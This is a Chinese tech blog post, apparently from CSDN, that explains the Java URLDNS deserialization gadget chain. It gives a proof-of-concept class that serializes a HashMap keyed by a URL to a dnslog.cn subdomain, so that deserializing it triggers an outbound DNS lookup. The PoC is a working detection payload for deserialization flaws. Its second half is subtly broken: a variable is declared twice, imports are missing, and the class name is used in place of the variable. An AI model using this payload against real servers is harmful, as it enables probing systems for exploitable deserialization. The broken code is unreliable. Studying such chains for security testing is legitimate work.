java url dns_java urldns反序列化

最新推荐文章于 2024-06-02 16:21:15 发布
最新推荐文章于 2024-06-02 16:21:15 发布
阅读量119 收藏
点赞数
文章标签: java url dns
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_34475062/article/details/114113840
版权

java反序列化urldns

漏洞触发点在hashmap

gadget chain

HashMap.readObject() //首先呼叫hashmap的readobject方法

HashMap.putVal() //在readObject()内执行了putval函数,putval函数内会计算key的hash,会呼叫hash()方法

HashMap.hash() //呼叫hash()方法

URL.hashCode() //在hash方法内呼叫 handler的hashcode()方法,这里调用的是java.net.URL库中的hashcode函数

URLStreamHandler.hashCode() //这里调用的是java.net.URL库中的hashcode函数,当hashcode=-1时会去做dns查询

URLStreamHandler.getHostAddress() //这里调用的是java.net.URL库中的getHostAddress函数

HashMap 为了和保持反序列化后状态的一致性,所以重写了 HashMap.readObject() 方法

在过程中,重新计算 Key 和 Value 的位置,并填充进新的 HashMap 中

import java.io.ByteArrayInputStream;

import java.io.ByteArrayOutputStream;

import java.io.ObjectInputStream;

import java.io.ObjectOutputStream;

import java.lang.reflect.Field;

import java.util.HashMap;

import java.net.URL;

public class Main {

public static void main(String[] args) throws Exception{

HashMap hashMap = new HashMap(); //实例化hashmap

URL url = new URL("http://h1kttt.dnslog.cn"); //将url对象中存入要访问的url

Field f = Class.forName("java.net.URL").getDeclaredField("hashCode"); //利用java反射机制获取url的hashcode

f.setAccessible(true); //设置反射的访问

f.set(url, 12321312); //把hashcode的值设置为随便一个值,避免第一次就直接访问

hashMap.put(url, "zero"); //设置putval的key和value值,key是url,value是zero

//之后在putval内会调用hash函数,而hash函数会调用key的hashcode函数,也就是url的hashcode

f.set(url, -1); //将hashcode的值设置为-1,就会执行hashcode函数去查询url的host地址 #实际测试得知hashcode默认就是-1,这里其实设置不设置-1没什么关系,都会执行查询

/*这里是直接序列化的方法*/

ByteArrayOutputStream baos = new ByteArrayOutputStream(); //实例化一个字节数组输出流

ObjectOutputStream oos = new ObjectOutputStream(baos); //实例化对象输出流,需要提供字节数组输出流对象

oos.writeObject(hashMap); //序列化写入对象

byte[] bytes = baos.toByteArray(); //把缓冲区的内容序列化成字节流

ObjectInputStream objos = new ObjectInputStream(new ByteArrayInputStream(bytes)); //读入序列化字符组

objos.readObject(); //反序列化

/*这里是生成序列化到文件再进行反序列化的方法*/

FileOutputStream fos = new FileOutputStream(new File("urldns.ser"));

ObjectOutputStream oos = new ObjectOutputStream(fos);

oos.writeObject(HashMap);

oos.close();

ObjectInputStream ois = new ObjectInputStream(new FileInputStream("urldns.ser"));

ois.readObject();

}

}

技术巫师
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
序列URLDNS
BaiScorpio的博客
06-13 428
通过 URLDNS学习Java序列相关的知识。
java url dns_Java安全之URLDNS
weixin_39918084的博客
02-13 161
Java安全之URLDNS链0x00 前言在学习Java序列漏洞的时候,就不得不学习他的一个利用链。很多刚刚入门的对于利用链这个词可能比较陌生。那么这里先来了解一下Java序列序列漏洞的一个产生。0x01 Java序列Java提供了一种对象序列的机制,用一个字节序列表示一个对象,该字节包含对象的数据、对象的类型、对象的存储属性。字节序列写出到文件后,相当于可以持久报错了一个对...
Java序列-URLDNS链(个人学习)
最新发布
Rsecret的博客
06-02 838
URLDNS 是ysoserial中利用链的一个名字,通常用于检测是否存在Java序列漏洞。不限制jdk版本,使用Java内置类,对第三方依赖没有要求。所以通常用于检测序列的点目标无回显,可以通过DNS请求来验证是否存在序列漏洞URLDNS利用链,只能发起DNS请求,并不能进行其他利用为什么选择HashMap作为入口类?参数种类多并且可控类可序列,实现了了序列接口最终走到序列触发的readObject。
Java序列URLDNS
m0_61572518的博客
04-14 2449
序列代码: import java.io.FileOutputStream; import java.io.IOException; import java.io.ObjectOutputStream; import java.lang.reflect.Field; import java.net.URL; import java.util.HashMap; public class UrlDnsClient { public static void main(String[] args)
java url dns_JAVA序列URLDNS链分析
weixin_34093899的博客
02-13 252
前言从之前shiro、fastjson等序列漏洞刚曝出的时候,就接触ysoserial的工具利用了,不过这么久都没好好去学习过其中的利用链,这次先从其中的一个可以说是最简单的利用链URLDNS开始学起。分析复制到IDEA中,并导入ysoserial的jar包,当然也可以直接构建生成整个ysoserial项目,然后找到对应的java文件进行调试。先看下整体代码:public class URLD...
Java序列入门之URLDNS链1
08-03
本文将深入探讨Java序列的基本概念、相关方法、以及如何利用ysoserial工具进行漏洞利用,特别关注URLDNS链的原理和构建。 首先,Java序列是指将已序列的对象数据恢复为原来的对象状态。在Java中,序列...
109-Java序列之ysoserial URLDNS模块分析.pdf
09-20
Java 序列之 ysoserial URLDNS 模块分析 Java 序列漏洞是 Java 语言中的一种常见漏洞,利用 ysoserial 工具可以对其进行攻击。ysoserial 是一个 Java 序列漏洞利用工具,提供了多种 payload,可以对...
URLDNS序列链学习.doc
07-09
URLDNS序列链学习】文档主要涉及的是Java中的一个安全问题,即URLDNS序列链。这是一种利用Java对象序列机制进行攻击的技术,通常与代码注入和远程代码执行(RCE)漏洞相关。在这个特定的案例中,虽然不能...
S02-URLDNS序列构造链1
08-03
总的来说,`S02-URLDNS序列构造链1`是一个利用Java序列漏洞的实例,通过精心构造的序列对象和`SilentURLStreamHandler`,可以在序列过程中触发DNS查询,这对于安全测试和漏洞探测具有重要意义。...
ShiroScan:Shiro RememberMe 1.2.4序列入侵图形检测工具(Shiro-550)
03-18
有三种方式进行检测,第一种是利用URLDNS进行检测,第二种利用命令执行进行检测,第三种使用SimplePrincipalCollection序列后进行检测(XCheck ,即X光检查)。 功能简介 默认DNSLOG 选择后会调用dnslog.cn的接口...
[JAVA序列] URLDNS
snowlyzz的博客
11-08 831
[Java序列]—URLDNS链 分析
Java序列URLDNS
m0_62466350的博客
05-28 760
URLDNS链是java原生态的一条利用链,通常用于存在序列漏洞进行验证的,因为是原生态,不存在什么版本限制。不限制jdk版本,使用Java内置类,对第三方依赖没有要求目标无回显,可以通过DNS请求来验证是否存在序列漏洞URLDNS利用链,只能发起DNS请求,并不能进行其他利用这条链路还是比较简单的,通常用于存在序列漏洞进行验证的,学好了才能更好的为后面打基础。
URLDNS序列
遇事不决冲冲冲
01-28 4016
URLDNS URLDNS算是一条比较简单的利用链,这条链不依赖第三方库,它无法执行系统命令,成功利用的结果也只是实现服务器的一次url解析,主要用这条链来判断服务器是否存在序列。接下来就这条链的原理和poc进行分析。 原理分析 首先了解这一下这条链是怎样执行的,代码中最重要的三个类是HashMap,URL,URLStreamHandler。其中HashMap重写了readObject方法,URL类是里面有个hashCode()方法被HashMap的readObject()调用了,URLStreamHa
java url dns_Java序列URLDNS链分析
weixin_42504279的博客
02-24 768
预备知识Java序列会调用对应的readobject方法比如我创建一个类test。序列test类就会调用writeobject方法,序列就会调用test类的readobject方法。默认是存在的。可以重写readobject方法链子分析在HashMap中。存在readobject方法。最后会调用hash(key)然后hash(key)又会调用key.hashCode方法而URL类又存在一...
通过URLDNS来入门java序列
weixin_44502336的博客
10-26 1083
URLDNS链复现
Java 序列(二) URLDNS链分析
Vicl1fe的博客
03-24 724
前言
Java序列-URLDNS学习
whojoe的博客
07-06 302
Java序列-URLDNS学习前言代码分析ysoserial中的利用方式参考文章 前言 在复现漏洞的时候经常使用dnslog来进行测试,当然有一定的局限性,只能在机器出网的时候才可以使用,并且在一些不知道利用链的情况下 使用urldns的利用链来进行打dnslog效果比较好,因为其没有诸多的限制 文章中如果有错误欢迎各位师傅斧正 代码 这里的代码是直接粘贴天下大木头师傅的,后面做学习分析 import java.io.*; import java.lang.reflect.Field; import j
java dns 缓存_jvm dns缓存问题解决方式
05-24
Java中,DNS缓存是由Java虚拟机(JVM)维护的。默认情况下,JVM会对DNS信息进行缓存以提高性能。但是,这可能会导致一些问题,例如当DNS服务器上的IP地址更改时,JVM可能仍然会使用旧的地址。 解决这个问题的方法...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值